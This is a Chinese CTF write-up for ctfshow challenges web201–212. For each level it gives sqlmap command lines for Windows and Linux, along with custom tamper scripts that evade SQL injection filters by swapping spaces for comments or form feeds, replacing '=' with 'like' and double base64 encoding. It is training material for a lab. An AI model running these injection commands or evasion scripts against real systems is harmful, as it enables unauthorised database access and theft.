ctfshow web201-?(持续更新) sqlmap启动！！！

web201

        windows的sqlmap命令

python sqlmap.py -u http://{题目链接}/api/?id=1^
 --technique=U --level 1 --risk 1 --batch -p"id"^
 --user-agent="sqlmap"^
 --referer="ctf.show"

        linux的sqlmap命令

sqlmap -u http://{题目链接}/api/?id=1\
 --technique=U --level 1 --risk 1 --batch -p"id"\
 --user-agent="sqlmap"\
 --referer="ctf.show"

web202

        windows的sqlmap命令

python sqlmap.py -u http://{题目链接}/api/^
 --technique=U --level 1 --risk 1 --batch -p"id"^
 --data "id=1"^
 --user-agent="sqlmap"^
 --referer="ctf.show"

        linux的sqlmap命令

sqlmap -u http://{题目链接}/api/\
 --technique=U --level 1 --risk 1 --batch -p"id"\
 --data "id=1"\
 --user-agent="sqlmap"\
 --referer="ctf.show"

web203

        windows的sqlmap命令

python sqlmap.py -u http://{题目链接}/api/index.php ^
 --technique=U --level 1 --risk 1 --batch -p"id"^
 --data "id=1"^
 --user-agent="sqlmap"^
 --referer="ctf.show"^
 --method="PUT"^
 --header="Content-Type:text/plain"

        linux的sqlmap命令

sqlmap -u "http://{题目链接}/api/index.php" \
 --technique=U --level 1 --risk 1 --batch -p"id"\
 --data "id=1"\
 --user-agent="sqlmap"\
 --referer="ctf.show"\
 --method="PUT"\
 --header="Content-Type:text/plain"

web204

        windows的sqlmap命令

python sqlmap.py -u http://{题目链接}/api/index.php ^
 --technique=U --level 1 --risk 1 --batch -p"id"^
 --data "id=1"^
 --user-agent="sqlmap"^
 --referer="ctf.show"^
 --method="PUT"^
 --header="Content-Type:text/plain"^
 --cookie="PHPSESSID={你的cookie};ctfshow={你的cookie};"

        linux的sqlmap命令

sqlmap -u "http://{题目链接}/api/index.php" \
 --technique=U --level 1 --risk 1 --batch -p"id"\
 --data "id=1"\
 --user-agent="sqlmap"\
 --referer="ctf.show"\
 --method="PUT"\
 --header="Content-Type:text/plain"\
 --cookie="PHPSESSID={你的cookie};ctfshow={你的cookie};"

web205

         windows的sqlmap命令

python sqlmap.py -u http://{题目链接}/api/index.php ^
 --technique=U --level 1 --risk 1 --batch -p"id"^
 --data "id=1"^
 --user-agent="sqlmap"^
 --referer="ctf.show"^
 --method="PUT"^
 --header="Content-Type:text/plain"^
 --cookie="PHPSESSID={你的cookie};"^
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1

        linux的sqlmap命令

sqlmap -u "http://{题目链接}/api/index.php" \
 --technique=U --level 1 --risk 1 --batch -p"id"\
 --data "id=1"\
 --user-agent="sqlmap"\
 --referer="ctf.show"\
 --method="PUT"\
 --header="Content-Type:text/plain"\
 --cookie="PHPSESSID={你的cookie};"\
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1

web206

可直接使用web205的命令

        windows的sqlmap命令

python sqlmap.py -u http://{题目链接}/api/index.php ^
 --technique=U --level 1 --risk 1 --batch -p"id"^
 --data "id=1"^
 --user-agent="sqlmap"^
 --referer="ctf.show"^
 --method="PUT"^
 --header="Content-Type:text/plain"^
 --cookie="PHPSESSID={你的cookie};"^
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1^
 --prefix="')" --suffix="#"

        linux的sqlmap命令

sqlmap -u "http://{题目链接}/api/index.php" \
 --technique=U --level 1 --risk 1 --batch -p"id"\
 --data "id=1"\
 --user-agent="sqlmap"\
 --referer="ctf.show"\
 --method="PUT"\
 --header="Content-Type:text/plain"\
 --cookie="PHPSESSID={你的cookie};"\
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1\
 --prefix="')" --suffix="#"

web207

不知道为什么，就只有用“/**/”替换“ ”可以成功，其他空白符替换空格无法成功

        windows的sqlmap命令

python sqlmap.py -u http://{题目链接}/api/index.php ^
 --technique=U --level 1 --risk 1 --batch -p"id"^
 --data "id=1"^
 --user-agent="sqlmap"^
 --referer="ctf.show"^
 --method="PUT"^
 --header="Content-Type:text/plain"^
 --cookie="PHPSESSID={你的cookie};"^
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1^
 --tamper="space2comment"

        linux的sqlmap命令

sqlmap -u "http://{题目链接}/api/index.php" \
 --technique=U --level 1 --risk 1 --batch -p"id"\
 --data "id=1"\
 --user-agent="sqlmap"\
 --referer="ctf.show"\
 --method="PUT"\
 --header="Content-Type:text/plain"\
 --cookie="PHPSESSID={你的cookie};"\
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1\
 --tamper="space2comment"

tamper内容

space2comment.py(sqlmap自带)

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    'SELECT id FROM users' >>> 'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/**/"
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/**/"
                continue

            retVal += payload[i]

    return retVal

web208

不能使用参数  “--technique=U” 不然sqlmap找不到漏洞

但是可以发现union联合注入 很抽象

        windows的sqlmap命令

python sqlmap.py -u http://{题目链接}/api/index.php ^
 --level 1 --risk 1 --batch -p"id"^
 --data "id=1"^
 --user-agent="sqlmap"^
 --referer="ctf.show"^
 --method=PUT^
 --header="Content-Type:text/plain"^
 --cookie="PHPSESSID={你的cookie};"^
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1^
 --tamper="space2comment,临时test"

        linux的sqlmap命令

sqlmap -u "http://{题目链接}/api/index.php" \
 --level 1 --risk 1 --batch -p"id"\
 --data "id=1"\
 --user-agent="sqlmap"\
 --referer="ctf.show"\
 --method="PUT"\
 --header="Content-Type:text/plain"\
 --cookie="PHPSESSID={你的cookie};"\
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1\
 --tamper="space2comment,临时test"

tamper内容

space2comment.py(sqlmap自带)

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    'SELECT id FROM users' >>> 'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/**/"
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/**/"
                continue

            retVal += payload[i]

    return retVal

临时test.py

这个是为了保险，绕过“str_replace('select', '', $id);”用的

sqlmap正常情况下都是用大写的SELECT

不添加不影响

import re

from lib.core.common import singleTimeWarnMessage
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def tamper(payload, **kwargs):
    """
    sEleCt >>> SELECT
    """

    keyword = "SELECT"
    retVal = payload

    if payload:
        retVal = re.sub(r"(?i)\b%s\b" % keyword, "%s" % keyword, retVal)

    return retVal

web209

        windows的sqlmap命令

python sqlmap.py -u http://{题目链接}/api/index.php ^
 --technique=U --level 1 --risk 1 --batch -p"id"^
 --data "id=1"^
 --user-agent="sqlmap"^
 --referer="ctf.show"^
 --method="PUT"^
 --header="Content-Type:text/plain"^
 --cookie="PHPSESSID={你的cookie};"^
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1^
 --tamper="空格_x0c,=_like"

        linux的sqlmap命令

sqlmap -u "http://{题目链接}/api/index.php" \
 --technique=U --level 1 --risk 1 --batch -p"id"\
 --data "id=1"\
 --user-agent="sqlmap"\
 --referer="ctf.show"\
 --method="PUT"\
 --header="Content-Type:text/plain"\
 --cookie="PHPSESSID={你的cookie};"\
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1\
 --tamper="空格_x0c,=_like"

tamper内容

空格_x0c.py

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    ' ' >>> '\x0c'
    'SELECT id FROM users' >>> 'SELECT\x0cid\x0cFROM\x0cusers'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += r"\x0c"
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += r"\x0c"
                continue

            retVal += payload[i]

    return retVal

=_like.py

from lib.core.common import singleTimeWarnMessage
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def tamper(payload, **kwargs):
    """
    '=' >>> ' like '
    '1 UNION SELECT 1=1--' >>> '1 UNION SELECT 1 like 1--'
    """
    retVal = payload

    if payload:
        retVal = retVal.replace("="," like ")

    return retVal

web210

        windows的sqlmap命令

python sqlmap.py -u http://{题目链接}/api/index.php ^
 --technique=U --level 1 --risk 1 --batch -p"id"^
 --data "id=1"^
 --user-agent="sqlmap"^
 --referer="ctf.show"^
 --method="PUT"^
 --header="Content-Type:text/plain"^
 --cookie="PHPSESSID={你的cookie};"^
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1^
 --tamper="临时test"

        linux的sqlmap命令

sqlmap -u "http://{题目链接}/api/index.php" \
 --technique=U --level 1 --risk 1 --batch -p"id"\
 --data "id=1"\
 --user-agent="sqlmap"\
 --referer="ctf.show"\
 --method="PUT"\
 --header="Content-Type:text/plain"\
 --cookie="PHPSESSID={你的cookie};"\
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1\
 --tamper="临时test"

tamper内容

临时test.py

from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    '1234' >>> 'PT1RTXlNRE4='
    """
    retVal = payload[::-1]
    retVal = encodeBase64(retVal, binary=False)
    retVal = retVal[::-1]
    retVal = encodeBase64(retVal, binary=False)
    
    return retVal

 web211

不能使用参数  “--technique=U” 不然sqlmap找不到漏洞

但是可以发现union联合注入 很抽象

        windows的sqlmap命令

python sqlmap.py -u http://{题目链接}/api/index.php ^
 --level 1 --risk 1 --batch -p"id"^
 --data "id=1"^
 --user-agent="sqlmap"^
 --referer="ctf.show"^
 --method="PUT"^
 --header="Content-Type:text/plain"^
 --cookie="PHPSESSID={你的cookie};"^
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1^
 --tamper="space2comment,临时test"

        linux的sqlmap命令

sqlmap -u "http://{题目链接}/api/index.php" \
 --level 1 --risk 1 --batch -p"id"\
 --data "id=1"\
 --user-agent="sqlmap"\
 --referer="ctf.show"\
 --method="PUT"\
 --header="Content-Type:text/plain"\
 --cookie="PHPSESSID={你的cookie};"\
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1\
 --tamper="space2comment,临时test"

tamper内容

 space2comment.py(sqlmap自带)

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    'SELECT id FROM users' >>> 'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/**/"
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/**/"
                continue

            retVal += payload[i]

    return retVal

临时test.py

from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    '1234' >>> 'PT1RTXlNRE4='
    """
    retVal = payload[::-1]
    retVal = encodeBase64(retVal, binary=False)
    retVal = retVal[::-1]
    retVal = encodeBase64(retVal, binary=False)
    
    return retVal

web212

        windows的sqlmap命令

python sqlmap.py -u http://{题目链接}/api/index.php ^
 --technique=U --level 1 --risk 1 --batch -p"id"^
 --data "id=1"^
 --user-agent="sqlmap"^
 --referer="ctf.show"^
 --method="PUT"^
 --header="Content-Type:text/plain"^
 --cookie="PHPSESSID={你的cookie};"^
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1^
 --tamper="空格_x0c,临时test"

        linux的sqlmap命令

sqlmap -u "http://{题目链接}/api/index.php" \
 --technique=U --level 1 --risk 1 --batch -p"id"\
 --data "id=1"\
 --user-agent="sqlmap"\
 --referer="ctf.show"\
 --method="PUT"\
 --header="Content-Type:text/plain"\
 --cookie="PHPSESSID={你的cookie};"\
 --safe-url="http://{题目链接}/api/getToken.php" --safe-freq=1\
 --tamper="空格_x0c,临时test"

tamper内容

空格_x0c.py

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    ' ' >>> '\x0c'
    'SELECT id FROM users' >>> 'SELECT\x0cid\x0cFROM\x0cusers'
    """
    retVal = payload

    retVal = retVal.replace(" ",chr(0x0c))
    return retVal

临时test.py

from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    '1234' >>> 'PT1RTXlNRE4='
    """
    retVal = payload[::-1]
    retVal = encodeBase64(retVal, binary=False)
    retVal = retVal[::-1]
    retVal = encodeBase64(retVal, binary=False)
    
    return retVal